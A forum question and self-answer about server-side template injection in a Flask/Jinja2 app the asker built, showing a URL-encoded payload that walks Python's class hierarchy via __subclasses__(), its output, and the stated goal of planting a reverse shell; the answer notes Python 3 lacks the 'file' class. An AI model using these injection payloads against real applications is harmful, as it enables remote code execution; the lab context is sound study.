# Flask/Jinja2 SSTI to get RCE. <type 'file'> not in object subclasses

Tags: web-application, exploit, injection, python

I'm trying to get RCE in a simple Flask web app I developed, which is vulnerable to server side template injection (SSTI).

RCE is usually obtained by uploading the reverse shell script on the target, thanks to a `file` reference, accesses by using the `object.__subclasses__()` method.

**URL with Payload**

```
http://0.0.0.0:5000/%7B%7B''.__class__.__mro__[1].__subclasses__()%7D%7D
```

**Breakdown**

```
{{''.__class__}}  => <class 'str'>
{{''.__class__.__mro__}}  => (<class 'str'>, <class 'object'>)
{{''.__class__.__mro__[1]}}  => <class 'object'>
{{''.__class__.__mro__[1].__subclasses__()}}  => [<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, ...
```

**Response page**

```
Oops! That page doesn't exist.
http://0.0.0.0:5000/[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, ...
```

Unfortunately, in the output I get, there isn't any `file` reference , so I'm not able to upload the reverse shell.

What am I missing?

Answer (score 1):

After further research, I think I figured out why. It seems that the latest versions of Python are not vulnerable to the metodology briefly explained in my original post.

The Flask web app I was using as target was indeed running inside a Docker container, with the latest version of Python installed.

A simple way to check it out:

**Python 2.7.10**

```
>>> object.__subclasses__()
[<type 'type'>, <type 'weakref'>,..., <type 'file'>, ...]
```

**Python 3.7.1**

```
>>> object.__subclasses__()
[<class 'type'>, <class 'weakref'>, ... ] # no <type 'file'> or <class 'file'>
```